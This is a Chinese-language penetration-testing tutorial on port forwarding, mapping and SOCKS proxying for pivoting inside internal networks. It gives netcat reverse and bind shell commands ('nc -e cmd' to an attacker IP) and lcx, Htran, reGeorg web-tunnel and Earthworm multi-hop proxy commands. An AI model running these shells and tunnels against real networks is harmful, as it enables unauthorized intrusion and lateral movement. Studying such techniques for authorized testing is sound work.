内网渗透之端口转发、映射、代理
字数 1915 2025-08-26 22:11:51
内网渗透之端口转发、映射与代理技术详解
端口转发与端口映射
基本概念
端口转发(Port forwarding):将一个网络端口从一个网络节点转发到另一个网络节点的行为,使外部用户能够通过激活的NAT路由器到达私有内部IP地址上的端口。
端口映射(Port mapping):NAT的一种,功能是把公网地址翻译成私有地址,将内网端口映射到公网上的某个端口。
区别与应用场景
- 端口映射场景:外网主机A想访问内网主机B上的服务
- 端口转发场景:外网主机A可以访问内网主机B的端口,但无法访问内网主机C的端口,此时可将C主机的端口转发到B主机的端口
正向连接与反向连接
- 正向连接:攻击者机器连接目标机器
- 反向连接:目标机器反连攻击者机器
常用工具及使用方法
Netcat (NC)
反向连接
场景:A(外网)无法访问B(内网),但B可以访问A
- 在外网主机A上执行:
nc -nvlp 7777 - 在内网主机B上执行:
nc -e cmd 192.168.0.226 7777
正向连接
场景:A(内网)可以访问B(外网),但B不能访问A
- 在内网A上执行:
nc -l -p 5555 -e cmd.exe - 在外网主机B上执行:
nc -nvv 192.168.0.226 5555
Lcx
端口映射
场景:A(外网)无法访问B(内网),B可以访问A
- 在内网B上执行:
lcx.exe -slave 192.168.0.226 7777 192.168.32.132 3389 - 在外网A上执行:
lcx.exe -listen 7777 5555 - 连接A的5555端口即相当于连接B的3389
端口转发
场景:A可以访问B,B可以访问C,A不能访问C
- 在内网B上执行:
lcx.exe -tran 7777 192.168.32.135 3389 - 访问B的7777端口即相当于访问C的3389
Htran
环境一:绕过防火墙限制
- 在B主机上执行:
Htran2.4.exe -p -tran 7777 127.0.0.1 3389 - 连接B的7777端口即可访问其3389
环境二:多级转发
- 在A上监听:
HTran2.4.exe -p -listen 8888 9999 - 在B上执行:
HTran2.4.exe -p -slave 192.168.0.226 8888 127.0.0.1 3389 - 连接A的9999端口即相当于连接B的3389
代理技术
代理类别
- HTTP代理
- SOCKS代理
- FTP代理
- Telnet代理
- SSL代理
reGeorg + Proxychains
- 上传对应服务器脚本(tunnel.php)到目标服务器
- 访问确认代理成功(显示"All seems fine")
- 执行:
python2 reGeorgSocksProxy.py -u "http://192.168.32.130/tunnel.php" -p 8888 - 使用Proxifier配置代理规则
基于PowerShell的SOCKS4/5代理
使用Invoke-SocksProxy:
- 导入模块:
Import-Module .\Invoke-SocksProxy.psm1 - 创建代理:
Invoke-SocksProxy -bindPort 1234 - 客户端使用SOCKS代理软件连接指定端口
Earthworm (EW)
六种链路状态
- ssocksd
- rcsocks
- rssocks
- lcx_slave
- lcx_tran
- lcx_listen
典型用法
- 正向SOCKS服务器:
./ew -s ssocksd -l 1080 - 反弹SOCKS服务器:
- 公网主机:
./ew -s rcsocks -l 1080 -e 8888 - 内网主机:
./ew -s rssocks -d 1.1.1.1 -e 8888
- 公网主机:
- 多级级联:
./ew -s lcx_listen -l 1080 -e 8888./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
总结
端口转发、映射和代理技术是内网渗透中的核心技能,掌握这些技术可以突破网络限制,实现内网横向移动。不同工具适用于不同场景,需要根据实际网络环境选择合适的工具和方法。正向连接适用于攻击者可以直连目标的场景,反向连接则适用于目标可以出网但攻击者无法直连的场景。多级转发和代理技术可以穿透复杂的内网环境,实现深层次的渗透。